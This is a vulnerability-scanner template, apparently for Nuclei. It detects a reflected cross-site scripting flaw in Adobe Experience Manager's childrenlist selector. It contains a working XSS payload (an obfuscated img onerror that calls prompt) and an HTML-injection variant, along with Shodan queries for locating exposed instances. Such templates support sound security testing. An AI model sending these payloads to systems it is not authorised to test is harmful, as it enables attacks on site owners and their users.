id: aem-xss-childlist

info:
  name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting
  author: theabhinavgaur,ott3rly
  severity: medium
  description: |
    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the c>
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: xss,aem,adobe,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{rand_base(4)}}<iMg sRc=x data'a'oneRror=prompt(domain)>.childrenlist.html"
      - "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<iMg sRc="x" data oneRror="prompt(domain)"/>'
          - '<br /><br />please authenticate<br /><br />'
        condition: or

      - type: word
        part: body
        words:
          - 'data-coral-columnview-id'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
